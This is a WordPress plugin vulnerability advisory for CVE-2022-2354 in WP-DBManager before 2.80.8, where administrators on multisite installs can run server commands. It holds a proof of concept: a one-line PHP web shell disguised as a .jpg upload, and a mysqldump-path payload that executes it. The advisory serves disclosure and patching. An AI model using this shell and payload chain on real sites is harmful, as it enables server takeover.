WordPress Plugin Vulnerabilities

WP-DBManager < 2.80.8 - Admin+ Remote Command Execution

Description

The plugin does not prevent administrators from running arbitrary commands on the server in multisite installations, where only super-administrators should.

Proof of Concept

# Use any WordPress plugin that allows the users to upload files with extension - ".php" is not required -  for example: .jpg (usually many plugins allows such extensions)
# Upload your malicious file, for example: test_rce.jpg with the following content:

<?php system("COMMAND"); ?>

# Go to "DB Options" under WP-DBManager plugin
# Define the below payload as "Path To mysqldump" parameter's value:

/usr/bin/php /var/www/blog/test_rce.jpg

# Go to "Backup DB" and click on "Backup" button
# Command will get executed without any issues

Affects Plugins

Plugin icon
wp-dbmanager
Fixed in 2.80.8

References

CVE
CVE-2022-2354

Classification

Type
RCE
OWASP top 10
A1: Injection
CWE
CWE-94
CVSS
5.5 (medium)

Miscellaneous

Original Researcher
Raad Haddad of Cloudyrion GmbH
Submitter
Raad Haddad of Cloudyrion GmbH
Submitter twitter
raadfhaddad
Verified
Yes
WPVDB ID
1c8c5861-ce87-4813-9e26-470d63c1903a

Timeline

Publicly Published
2022-07-25 (about 1 years ago)
Added
2022-07-25 (about 1 years ago)
Last Updated
2022-08-25 (about 1 years ago)

Other

Published
Title
Published
2021-09-13
Title
EditorsKit < 1.31.6 - Contributor+ Arbitrary PHP Code Execution
Published
2018-12-10
Title
WooCommerce <= 3.4.5 - Authenticated Phar Deserialization
Published
2022-10-14
Title
WP All Import < 3.6.9 - Admin+ Arbitrary File Upload to RCE
Published
2015-02-26
Title
Import any XML or CSV File to WordPress <= 3.2.3 - RCE
Published
2020-04-19
Title
Media Library Assistant < 2.82 - Authenticated RCE